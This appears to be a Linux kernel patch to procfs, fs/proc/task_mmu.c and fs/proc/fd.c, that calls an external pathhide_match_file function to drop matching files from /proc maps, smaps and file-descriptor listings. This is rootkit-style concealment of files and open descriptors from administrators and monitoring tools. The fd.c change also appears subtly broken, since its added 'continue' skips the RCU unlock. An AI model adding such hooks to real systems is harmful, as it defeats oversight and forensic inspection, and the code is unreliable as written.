--- a/fs/proc/task_mmu.c
+++ b/fs/proc/task_mmu.c
@@ -284,6 +284,10 @@
 	unsigned long start, end;
 	dev_t dev = 0;
 	const char *name = NULL;
+	extern bool pathhide_match_file(struct file *file);
+
+	if (file && pathhide_match_file(file))
+		return;
 
 	if (file) {
 		struct inode *inode = file_inode(vma->vm_file);
@@ -929,6 +933,10 @@
 	char buf[256];
 	char *p;
 #endif
+	extern bool pathhide_match_file(struct file *file);
+
+	if (vma->vm_file && pathhide_match_file(vma->vm_file))
+		return 0;
 
 	memset(&mss, 0, sizeof(mss));
 

--- a/fs/proc/fd.c
+++ b/fs/proc/fd.c
@@ -243,6 +243,7 @@
 {
 	struct task_struct *p = get_proc_task(file_inode(file));
 	unsigned int fd;
+	extern bool pathhide_match_file(struct file *file);
 
 	if (!p)
 		return -ENOENT;
@@ -262,6 +263,8 @@
 		if (!f)
 			break;
 		data.mode = f->f_mode;
+		if (pathhide_match_file(f))
+			continue;
 		rcu_read_unlock();
 		data.fd = fd;
 
